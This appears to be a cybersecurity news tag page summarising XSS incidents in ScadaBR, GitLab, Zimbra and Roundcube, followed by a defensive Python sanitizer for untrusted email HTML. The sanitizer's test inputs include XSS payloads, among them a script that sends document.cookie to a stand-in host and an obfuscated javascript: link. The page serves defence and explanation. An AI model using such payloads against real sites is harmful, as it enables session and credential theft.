Tag: XSS

All articles tagged with #xss

cybersecurity, 1 month ago

CISA Adds OpenPLC ScadaBR XSS Vulnerability to KEV Amid Exploits

CISA has added CVE-2021-26829, an actively exploited XSS vulnerability in OpenPLC ScadaBR, to its Known Exploited Vulnerabilities (KEV) catalog. The listing underscores the continued interest of hacktivist groups such as TwoNet in exposed OT web interfaces: the group used this flaw against a honeypot and defaced the system. The intrusion chained default credentials with exploitation at the web-application layer, so the fix is as much about credential hygiene and exposure of the HMI as about the patch itself. Federal agencies are required to remediate by December 19, 2025. Separately, a long-running exploitation campaign against targets in Brazil has been observed using legitimate cloud infrastructure to evade detection.

cybersecurity, 1 year ago

GitLab Patches Critical Account Takeover Vulnerability

GitLab has patched a high-severity XSS vulnerability (CVE-2024-4835) in its VS Code editor (Web IDE) that could allow an unauthenticated attacker to take over user accounts. GitLab urges immediate upgrades to 17.0.1, 16.11.3 or 16.10.6 for both Community and Enterprise Editions. The same release also addresses six medium-severity flaws, including a CSRF vulnerability and a denial-of-service bug. GitLab accounts are high-value targets because of the source code and other sensitive data they host, and earlier GitLab vulnerabilities have been actively exploited, so the upgrade should not wait for a maintenance window.

cybersecurity, 2 years ago

Global Governments Targeted in Massive Zimbra Zero-Day Hacking Spree

Google's Threat Analysis Group (TAG) reported that attackers exploited a zero-day vulnerability in the Zimbra Collaboration email server, tracked as CVE-2023-37580, to steal sensitive data from government systems in multiple countries. The bug is a reflected XSS in the Zimbra Classic Web Client, so a victim only has to open a crafted link for attacker-controlled script to run inside their authenticated webmail session. Four distinct threat actors exploited it, most of them in the window after Zimbra had pushed a hotfix to GitHub but before the official patched release shipped. Observed payloads exfiltrated email data and credentials, set up mail auto-forwarding rules, and redirected users to phishing pages. TAG's report stresses that even medium-severity vulnerabilities need timely patching, since adversaries watch public fixes and weaponize them quickly. The incident is another example of XSS flaws in webmail clients being used to get at the mailboxes behind them.

cybersecurity, 2 years ago

Massive Cyber Espionage Campaign Targets European Governments with Webmail Zero-Day Exploit

Pro-Russia hackers known as Winter Vivern exploited a zero-day stored XSS vulnerability in Roundcube (CVE-2023-5631), a widely used webmail package, to target governmental entities and a think tank in Europe. The attackers sent a specially crafted HTML email; when a victim viewed it in a browser, JavaScript smuggled in an SVG element ran in the victim's Roundcube session, enumerated the mailbox and exfiltrated messages to a server controlled by the threat actor. No user interaction beyond opening the message was required. The attacks began on October 11, 2023 and were detected by ESET, which promptly reported the vulnerability to the Roundcube developers. Winter Vivern has previously targeted US government officials and has been active since at least 2020, focusing primarily on Europe and Central Asia. Roundcube users should make sure they are running a patched release (1.6.4, 1.5.5 or 1.4.15 and later).
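The Roundcube item above, and the Zimbra one before it, both come down to a webmail client letting attacker-supplied markup reach the user's browser. The block below is an added example written for this page, not code from Roundcube, Zimbra, ESET or any other vendor mentioned here: an allowlist sanitizer for untrusted HTML email bodies using only the Python standard library. It shows the controls that close off the stored-XSS-via-email class (the Roundcube case): tokenizing with a real parser rather than regexes, dropping every attribute except a short allowlist, rejecting non-http(s)/mailto link schemes even when obfuscated with tabs or mixed case, and discarding the entire subtree of script-capable elements such as `<svg>` and `<script>`. The tag and attribute allowlists, the function names and the sample inputs are this example's own choices and are constructed, not taken from the incidents.

```python
"""Allowlist HTML sanitizer for untrusted e-mail bodies (added example).

Not Roundcube, Zimbra or any vendor's code. Standard library only: html.parser
tokenises the markup, so nothing here regexes over raw HTML. Policy: keep a few
formatting tags, strip every attribute except href/title on <a>, allow only
http/https/mailto links, and discard the whole subtree of any element that can
run script. Unknown tags are dropped but their text content is kept.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Policy tables: assumptions of this example, tune them to the client's needs.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li",
                "blockquote", "div", "span", "a"}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}   # every other tag keeps no attributes
URL_ATTRS = {"href"}
SAFE_URL_SCHEMES = {"http", "https", "mailto"}
# Script-capable containers: nothing inside them may reach the DOM.
DROP_CONTENT_TAGS = {"script", "style", "svg", "math", "object", "embed",
                     "iframe", "frame", "template", "noscript"}
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def _safe_url(value):
    """Return the cleaned URL if its scheme is allowed, otherwise None.

    Browsers delete tabs and newlines before parsing the scheme, so
    "java\\tscript:" still runs as javascript:; mirror that before checking.
    """
    cleaned = _CONTROL_CHARS.sub("", value).strip()
    try:
        scheme = urlparse(cleaned).scheme       # urlparse lower-cases the scheme
    except ValueError:                          # e.g. malformed IPv6 literal
        return None
    return cleaned if scheme in SAFE_URL_SCHEMES else None


class EmailHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized output fragments
        self._open = []      # allowed tags currently open, so output stays balanced
        self._dropping = []  # stack of DROP_CONTENT_TAGS we are currently inside

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._dropping.append(tag)          # discard the whole subtree
            return
        if self._dropping or tag not in ALLOWED_TAGS:
            return
        parts = [tag]
        for name, value in attrs:               # parser lower-cases names, unescapes values
            if value is None or name.startswith("on"):
                continue                        # on* event handlers never survive
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                        # style=, class=, id=, src=, ...
            if name in URL_ATTRS:
                value = _safe_url(value)
                if value is None:
                    continue                    # javascript:, data:, vbscript: ...
            parts.append(f'{name}="{escape(value, quote=True)}"')
        if tag == "a" and any(p.startswith("href=") for p in parts[1:]):
            parts.append('rel="noopener noreferrer"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._dropping:
            if tag in self._dropping:           # unwind to the matching dropped element
                while self._dropping.pop() != tag:
                    pass
            return
        if tag in VOID_TAGS or tag not in self._open:
            return                              # stray close tag: ignore it
        while True:                             # close up to and including `tag`
            t = self._open.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(escape(data, quote=False))   # text is always re-escaped

    # Comments (including IE conditional comments), doctypes and processing
    # instructions hit the base-class no-op handlers, i.e. they are dropped.


def sanitize_email_html(html):
    p = EmailHtmlSanitizer()
    p.feed(html)
    p.close()                                   # flush buffered trailing text
    while p._open:                              # close whatever the mail left open
        p.out.append(f"</{p._open.pop()}>")
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed samples; not payloads from any incident described on this page.
    for sample in [
        '<p onmouseover="steal()">Hi <b>there</b></p>',
        '<a href="JaVa\tScRiPt:alert(1)">click</a>',
        '<svg><script>fetch("https://c2.invalid/?" + document.cookie)</script></svg>after',
        '<img src="https://t.invalid/p.gif" onerror="x()">body',
        '&lt;script&gt;not markup&lt;/script&gt;',
    ]:
        print(repr(sample), "->", repr(sanitize_email_html(sample)))
```

Two design points worth noting. The sanitizer fails closed: an `<svg>` or `<script>` that is never closed swallows the rest of the message rather than letting a partially parsed tail through, and images and relative links are dropped deliberately (remote images are a tracking vector, relative links resolve against the webmail origin). It also does not help with the Zimbra case, which was reflected XSS: there the injection point is a URL parameter echoed into the server's own page, and the fix is output encoding in the server-side template, not mail-body sanitization. For production a maintained sanitizer (for example DOMPurify on the client side) is the better choice; the value of this version is that every rule is visible.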